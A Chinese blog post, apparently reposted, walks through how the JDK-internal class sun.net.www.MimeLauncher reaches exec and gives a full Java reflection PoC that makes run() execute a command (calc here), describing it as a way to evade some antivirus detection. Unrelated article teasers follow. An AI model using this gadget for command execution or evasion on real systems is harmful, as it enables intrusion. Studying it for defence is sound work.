『Java安全』利用反射调用MimeLauncher.run()触发RCE

news2025/7/25 7:07:15

文章目录

  • 前言
  • MimeLauncher
    • run()
    • MimeLauncher()
  • 反射调用MimeLauncher.run()触发RCE
    • 条件
    • PoC

前言

rt.jar内的sun.net.www.MimeLauncher类的run方法调用了exec

在这里插入图片描述
据说可以有效绕过某些免杀,下面分析一下调用过程

MimeLauncher

run()

在这里插入图片描述
首先:调用了this.m.getTempFileTemplate()方法,this.m是构造器传入的·MimeEntry类,getTempFileTemplate()方法返回了StringMimeEntry.tempFileNameTemplate
在这里插入图片描述
然后run()接着调用了this.getTempFileName(),入参是this.uc.getURL()和上面拿到的String,this.uc是构造器传入的URLConnection,所以这里是获取了连接的URL
在这里插入图片描述
this.getTempFileName()没什么限制,只有第二行这里要保证传入字符串必须存在%s否则substring方法是会报错的
在这里插入图片描述
接着run()下面调用了this.is.read(),this.is是传入的InputStream,要出这个while也很简单,只要保证read返回值<0即可,因此要重写一个read方法恒返回<0就行

在这里插入图片描述
后面就是一些字符串替换什么的了,然后直接执行this.execPath的命令
在这里插入图片描述

因此这个方法只涉及四个重要变量:

  1. 构造器传入MimeEntry:要求TempFileTemplate有一个%s
  2. 构造器传入URLConnection
  3. 构造器传入InputStream:要求重写read方法返回值 < 0
  4. this.execPath是待执行的命令

MimeLauncher()

类属性

在这里插入图片描述
看一下构造器,前三个是调用run必须的变量,后面两个没用到
在这里插入图片描述
这里对this.m.getLaunchString()进行了if判断,首先它获取了MimeEntry的command属性
在这里插入图片描述
然后这个MimeEntry的command属性必须是一个存在的文件才能返回true,而且此时this.execPath也就是待执行的命令会被MimeEntry.command所覆盖
在这里插入图片描述
这个方法涉及两个重要变量:

  1. 构造器传入MimeEntry:command属性必须是一个存在的文件
  2. this.execPath必须在构造器调用之后才能覆盖成待执行的命令

反射调用MimeLauncher.run()触发RCE

条件

总结一下:

  • MimeEntry:TempFileTemplate为%s、command为一个存在的文件路径
  • URLConnection:任意URL,即使只有协议头http://都可以
  • InputStream:重写read()方法返回 < 0
  • MimeLauncher:this.execPath是待执行命令

PoC

package MimeLauncherTest;

import sun.net.www.MimeEntry;
import java.net.URL;
import java.net.URLConnection;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.Constructor;

public class ExecTest {
    public static void main(String[] args) throws Exception{

        String cmd = "cmd /c calc";

        MimeEntry mimeEntry = new MimeEntry("test");

        Class entryClass = Class.forName("sun.net.www.MimeEntry");

        Field tempFileTemplateField = entryClass.getDeclaredField("tempFileNameTemplate");
        tempFileTemplateField.setAccessible(true);
        tempFileTemplateField.set(mimeEntry, "%s");

        Field commandField = entryClass.getDeclaredField("command");
        commandField.setAccessible(true);
        commandField.set(mimeEntry, "C:\\Windows\\System32\\drivers\\etc\\hosts");

        URLConnection urlConnection = new URL("http://").openConnection();

        InputStream is = new InputStream() {
            @Override
            public int read() throws IOException {
                return -1;
            }
        };

        Class launcherClass = Class.forName("sun.net.www.MimeLauncher");

        Constructor mineLauncherConstructor = launcherClass.getDeclaredConstructor(MimeEntry.class, URLConnection.class, InputStream.class, String.class, String.class);
        mineLauncherConstructor.setAccessible(true);
        Thread mimeLauncher = (Thread) mineLauncherConstructor.newInstance(mimeEntry, urlConnection, is, "", "");

        Field execPathField = launcherClass.getDeclaredField("execPath");
        execPathField.setAccessible(true);
        execPathField.set(mimeLauncher, cmd);

        Method runMethod = launcherClass.getDeclaredMethod("run");
        runMethod.setAccessible(true);
        runMethod.invoke(mimeLauncher);

    }
}

在这里插入图片描述
因为创建了FileOutputStream,rce的同时会生成名称包含HJ的文件,详细逻辑可以在getTempFileName()查看(无伤大雅的小细节)

在这里插入图片描述

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://ho1aas.blog.csdn.net/article/details/127555739
版权声明:本文为原创,转载时须注明出处及本声明

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/35430.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

古人的名与字、号、讳、谥有什么区别

古人复杂的名字 这个世界上想来是不存在没有名字的人&#xff0c;即便真的有人没名字&#xff0c;也会被外人赠予姓名&#xff0c;比如说一些古人典籍里的“无名氏”&#xff0c;就是专门用来形容那些没有名字也不清楚根脚的人&#xff0c;即便是现如今一些作品不知道作者是谁…

信号与线性时不变系统的傅里叶描述

1、复正弦信号和线性时不变系统的频率相应 卷积积分和卷积和傅里叶变换冲激表示信号正弦表示信号输入信号表示为延迟冲激的加权叠加输入信号为复正弦信号的加权叠加输出可以用卷积的形式来表示输出可以用傅里叶的形式来表示 (1)频率响应Frequency response 线性时不变系统对正…

Java中mybatis的Mpper代理开发的详细使用步骤

目录 前言&#xff1a; 一、全图预览 二、使用步骤 1.pom.xml里面添加依赖包 2.新建统一配置文件&#xff08;俗称数据库连接文件&#xff09; 3.新建项目 4.新建映射文件&#xff08;俗称数据库对应表xml&#xff09; 5.测试 三、文中的全部代码&#xff08;去复制可…

MySQL如何保证主备一致?

1. MySQL主备的基本原理 如下图展示的是基本的主备切换流程&#xff1a; 在状态1中&#xff0c;主库是A&#xff0c;备库是B&#xff0c;所以客户端的读写都直接方法节点A。由于节点B是节点A的备库&#xff0c;所以备库B只是将A的更新都同步过来&#xff0c;本地执行&#x…

皕杰报表使用字体和部署后添加字体

Windows系统 1、打开Win10系统的字体安装文件夹&#xff0c;可以双击打开此电脑-->打开C盘-->打开Windows-->打开Fonts&#xff1b;也可先打开计算机&#xff0c;在计算机地址栏上直接拷贝“C:WindowsFonts”路径。回车打开Win10字体文件夹。 2.下载自己需要的字体。…

数组、链表、栈、队列、树

1. 数组&#xff08;Array&#xff09; 定义&#xff1a;数组是一种 线性表 数据结构&#xff0c;它用一组 连续的内存空间 存储一组具有 相同类型 的数据。 Java中 基本数据类型数组 的存储格式&#xff1a; int arr[] new int[3]; arr[0] 0; arr[1] 1; arr[2] 2;Java中…

拿去吧你,华为出品《看漫画学Python》零基础自学首选~

目前Python在人工智能、机器学习、大数据、数据分析、网络爬虫等领域广泛应用&#xff0c;是非常适合初学者入门和培养编程兴趣的一门语言。相比较其他主流编程语言而言&#xff0c;有更好的可读性&#xff0c;和满足感&#xff0c;上手相对容易。 但是很多零基础的同学不知道…

【C语言】 函数

函数 在计算机科学中&#xff0c;子程序 &#xff0c;一个大型程序中的某部分代码&#xff0c; 由一个或多个语句块组 成。它负责完成某项特定任务&#xff0c;而且相较于其他代 码&#xff0c;具备相对的独立性。 一般会有输入参数并有返回值&#xff0c;提供对过程的封装和细…

元组啊,不就是不可变的列表吗?

B站|公众号&#xff1a;啥都会一点的研究生 相关阅读 整理了几个100%会踩的Python细节坑&#xff0c;提前防止脑血栓 整理了十个100%提高效率的Python编程技巧&#xff0c;更上一层楼 Python-列表&#xff0c;从基础到进阶用法大总结&#xff0c;进来查漏补缺 Python-元组&…

【ABAP】EXIT_SAPLMBMB_001无法Debug调试问题处理

【ABAP】EXIT_SAPLMBMB_001无法Debug调试问题处理 不久前看到SAP Community里面有这样一个问题&#xff0c;可能比较老了&#xff0c;但个人觉得比较新奇&#xff0c;就去做了下面一个测试。 首先通过事务代码“CMOD”对增强“MB_CF001”&#xff08;更新物料凭证时的客户功能出…

《从零开始:机器学习的数学原理和算法实践》chap6

《从零开始&#xff1a;机器学习的数学原理和算法实践》chap6 学习笔记 文章目录6.1 凸函数6.2 梯度下降引入梯度是什么为啥梯度是上升最快的方向捏梯度下降与参数求解梯度下降过程演示6.3 代码实践 梯度下降一元函数的梯度下降多元函数的梯度下降6.1 凸函数 凸集 何为凸集 凸集…

c# 多线程

案例1 单线程与多线程对比 单线程会卡主线程,此时会将ui界面给卡住。而多线程开启以后就好了 不会卡住主线程,且运行速度快,相当于多个同时运动。 单线程按钮 private void singlethread_Click(object sender, EventArgs e){for

Kafka多生产者消费者自动配置

背景 项目中不同的业务可能会使用多个kafka&#xff0c;按默认的Kafka配置&#xff0c;最多是支持消费者和生产者使用不同的Kafka&#xff0c;如果两个生产者使用不同的Kafka则需要自定义配置&#xff0c;生成对应的bean。 解决方案 多生产者&#xff0c;多消费者&#xff0…

PowerDesigner 设置

PowerDesigner 设置前言推荐PowerDesigner 设置简单设置sql反向生成物理模型物理模型创建索引最后前言 以下内容源自自己 仅供学习交流使用 推荐 第11章 数据库的设计规范【2.索引及调优篇】【MySQL高级】 powerdesign 通过sql反向生成ER模型 PowerDesiner 15 在物理模型中…

Python测试框架之unittest和pytest 的区别

一、Unittest Unittest是Python标准库中自带的单元测试框架&#xff0c;Unittest有时候也被称为PyUnit&#xff0c;就像JUnit是Java语言的标准单元测试框架一样&#xff0c;Unittest则是Python语言的标准单元测试框架。 Unittest支持自动化测试&#xff0c;测试用例的初始化、…

FFN -> GLU -> GAU

1 GLU GLU的起源是2016年由Yann N. Dauphin在 论文:Language Modeling with Gated Convolutional Networks 在语言模型的建模方法上相比于循环神经网络更具有竞争力&#xff0c;提出了一种简单的线性门控单元来堆叠卷积层从而使得文本中的token可以并行化处理来获得上下文的语义…

HTTP响应详解

目录 一.状态码 小结&#xff08;记住&#xff09; 二.认识响应正文&#xff08;body&#xff09; 三.如何构造http请求 一.状态码 是一个数字&#xff0c;这个数字描述了当前这次请求的状态&#xff08;成功&#xff0c;失败&#xff0c;失败的原因&#xff09; http的状态…

Typora基础篇

Markdown基础 标题 #标题名字&#xff08;#号的个数代表标题的级数&#xff09; 文件-偏好设置-Markdown里面如果勾选了严格模式&#xff0c;那#与标题名称之间就需要加上一个空格一级标题用1个# 二级标题用2个# 三级标题用3个# 四级标题用4个# 五级标题用5个# ####### …

262-视口,布局视口,视觉视口,移动端适配,less语法,比哪里,DPR,RRI,less的弊端,运算,嵌套,混合,继承,混入,运算,

262-CSS中的单位 ◼ 前面编写的CSS中,我们经常会使用px来表示一个长度(大小),比如font-size设置为18px,width设置为100px。 ◼ px是一个长度(length)单位,事实上CSS中还有非常多的长度单位。 ◼ 整体可以分成两类:  绝对长度单位(Absolute length units);  相…

【uniapp】安装与使用uView组件库:

文章目录一、官网文档二、安装【1】进入控制台【2】初始化package.json【3】安装uView-ui【4】配置main.js【5】配置uni.scss【6】配置easycom组件模式【7】app.vue引入基础样式三、效果一、官网文档 https://www.uviewui.com/ 二、安装 【1】进入控制台 【2】初始化package…